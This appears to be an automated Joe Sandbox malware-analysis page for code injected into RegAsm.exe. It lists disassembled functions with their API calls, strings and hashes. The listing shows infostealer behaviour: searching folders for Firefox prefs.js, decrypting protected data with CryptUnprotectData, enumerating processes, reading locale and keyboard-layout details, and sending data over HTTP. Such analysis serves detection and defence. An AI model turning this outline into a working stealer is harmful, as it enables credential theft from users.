Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------
API String ID: 2402878923-2180234286
Opcode ID: 1df839c8eda1272945d6c9bca323601943277d1f6e2daffe811a2a66c9c6b0a0
Instruction ID: 3f466b8612cc2db17a5d9ea90efc92506b51061f54fe9a8e3d974c375c306076
Opcode Fuzzy Hash: 1df839c8eda1272945d6c9bca323601943277d1f6e2daffe811a2a66c9c6b0a0
Instruction Fuzzy Hash: 10124EB1911118AADB14FB91DD92FEEB339AF14314F50419EB10672091DF382F9ACF6A

Function 00413EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00413EC3
FindFirstFileA.KERNEL32(?,?), ref: 00413EDA
StrCmpCA.SHLWAPI(?,00420FAC), ref: 00413F08
StrCmpCA.SHLWAPI(?,00420FB0), ref: 00413F1E
FindNextFileA.KERNEL32(000000FF,?), ref: 0041406C
FindClose.KERNEL32(000000FF), ref: 00414081

Strings

%s\%s, xrefs: 00413EB7

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: 9a6d8ff04c8e49de142037fd75e625a17c3b1aefdbb2205979b39302d75946f2
Instruction ID: d668781d41669175768d5c9beeab67687ce79b442868c28804f29fd14ebf2a74
Opcode Fuzzy Hash: 9a6d8ff04c8e49de142037fd75e625a17c3b1aefdbb2205979b39302d75946f2
Instruction Fuzzy Hash: 475173B6910218BBCB24FBB0DC85FEA737DBB48304F40458DB61996180EB79DB858F95

Function 0040F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 0040F71E
StrCmpCA.SHLWAPI(?,004215BC), ref: 0040F76F
StrCmpCA.SHLWAPI(?,004215C0), ref: 0040F785
FindNextFileA.KERNELBASE(000000FF,?), ref: 0040FAB1
FindClose.KERNEL32(000000FF), ref: 0040FAC3

Strings

prefs.js, xrefs: 0040F812

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: prefs.js
API String ID: 3334442632-3783873740
Opcode ID: 02161ce0517172eec517e03f66e4530c266b6de62227eb6e2a5cc7ca8d77dd32
Instruction ID: 03b4e3240ed1b335229faca8164051f94e7388f89c5e809ad56520da5e6b4575
Opcode Fuzzy Hash: 02161ce0517172eec517e03f66e4530c266b6de62227eb6e2a5cc7ca8d77dd32
Instruction Fuzzy Hash: B0B194719011089BCB24FF61DD51FEE7379AF54304F4081BEA40A96191EF389B9ACF9A

Function 0040DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 0040DAEB
StrCmpCA.SHLWAPI(?,004214B4), ref: 0040DB33
StrCmpCA.SHLWAPI(?,004214B8), ref: 0040DB49
FindNextFileA.KERNELBASE(000000FF,?), ref: 0040DDCC
FindClose.KERNEL32(000000FF), ref: 0040DDDE

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: abec3618fe0f819f08ac4268a9e94c2cc235613d22d3d2b0289a84456f05d320
Instruction ID: 591a4703b72fe71aa373ebdc6cd180767c9b728ba7d7680c081136e576a94052
Opcode Fuzzy Hash: abec3618fe0f819f08ac4268a9e94c2cc235613d22d3d2b0289a84456f05d320
Instruction Fuzzy Hash: 3B91A776900104ABCB14FBB1EC469ED733DAF84304F40856EF81A961C1EE389B5DCB9A

Function 0040E430 Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00420D73), ref: 0040E4A2
StrCmpCA.SHLWAPI(?,004214F8), ref: 0040E4F2
StrCmpCA.SHLWAPI(?,004214FC), ref: 0040E508
FindNextFileA.KERNEL32(000000FF,?), ref: 0040EBDF

Strings

@, xrefs: 0040EBF5, 0040E5EB, 0040E71C, 0040E85B, 0040E4B9, 0040E5EE, 0040E71F, 0040E85E
\*.*, xrefs: 0040E44D

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*$@
API String ID: 433455689-2355794846
Opcode ID: 35ab6377c1e2dc3a184180762d54057be005264d6edcd4861ea76ca11900a53d
Instruction ID: 32b04220dc81db1066fec36fe382e2e0147ddb409d88bf53f78a4e8ff9751907
Opcode Fuzzy Hash: 35ab6377c1e2dc3a184180762d54057be005264d6edcd4861ea76ca11900a53d
Instruction Fuzzy Hash: 2612D5719111189ACB14FB71DD96EED7338AF54314F4045AEB00A62091EF386FDACFAA

Function 004016D0 Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00425104,?,00401F2C,?,004251AC,?,?,00000000,?,00000000), ref: 00401923
StrCmpCA.SHLWAPI(?,00425254), ref: 00401973
StrCmpCA.SHLWAPI(?,004252FC), ref: 00401989
FindNextFileA.KERNEL32(000000FF,?), ref: 00401E20
FindClose.KERNEL32(000000FF), ref: 00401E32

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

Strings

\*.*, xrefs: 004017F1

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: \*.*
API String ID: 3334442632-1173974218
Opcode ID: 7eedb8f8a08e20fa7655d729f6189e51a3414074fea287307438966961d566d1
Instruction ID: ec9ed5b7047c6bda7249a5c0e57325db5d04e86a6b28839c0a373f262e22f3db
Opcode Fuzzy Hash: 7eedb8f8a08e20fa7655d729f6189e51a3414074fea287307438966961d566d1
Instruction Fuzzy Hash: BD1270719111189BCB15FB61CD96EEE7338AF14314F4045AEB10A62091EF386FDACFA9

Function 00417B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 00417BE1
LocalAlloc.KERNEL32(00000040,?), ref: 00417BF9
GetKeyboardLayoutList.USER32(?,00000000), ref: 00417C0D
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417C62
LocalFree.KERNEL32(00000000), ref: 00417D22

Strings

/ , xrefs: 00417C7F

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: 08381a4b7f1aa01ac9a5d03d4b0a0666cc02ab67458fdc9de76e0bd8478d1419
Instruction ID: 4337a3d4516c1007e731de4e6e4702528bfdb1ea37c67bd3aa396c5a1b158d15
Opcode Fuzzy Hash: 08381a4b7f1aa01ac9a5d03d4b0a0666cc02ab67458fdc9de76e0bd8478d1419
Instruction Fuzzy Hash: 6B415E71941118ABDB24DB94DC99FEEB378FF44714F20419AE10962281DB382FC6CFA5

Function 00419600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041961E
Process32First.KERNEL32(00420ACA,00000128), ref: 00419632
Process32Next.KERNEL32(00420ACA,00000128), ref: 00419647
StrCmpCA.SHLWAPI(?,00000000), ref: 0041965C
CloseHandle.KERNEL32(00420ACA), ref: 0041967A

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
Instruction ID: 11d567adce4b572477f284a2ec541547db87c4b6fd8ba8cb36d7f0fd64301d48
Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
Instruction Fuzzy Hash: F201E9B9A40208ABCB24DFA5C958BEEB7F9EB49700F104189E90996250D7389F81CF61

Function 00409B60 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
memcpy.MSVCRT(?,?,?), ref: 00409BC6
LocalFree.KERNEL32(?), ref: 00409BD3

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotectmemcpy
String ID:
API String ID: 3243516280-0
Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
Instruction ID: 8471c3d920f6d21a6ca128c50317bdd839bed9d1cf50ed0ddd6ab59e3c77a746
Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
Instruction Fuzzy Hash: 46110CB8A00209EFDB04DF94D985AAE77B6FF89300F104569F915A7390D774AE10CF61

Function 00417A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,01342A20,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 00417A63
HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,01342A20,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A6A
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,01342A20,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A7D
wsprintfA.USER32 ref: 00417AB7

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
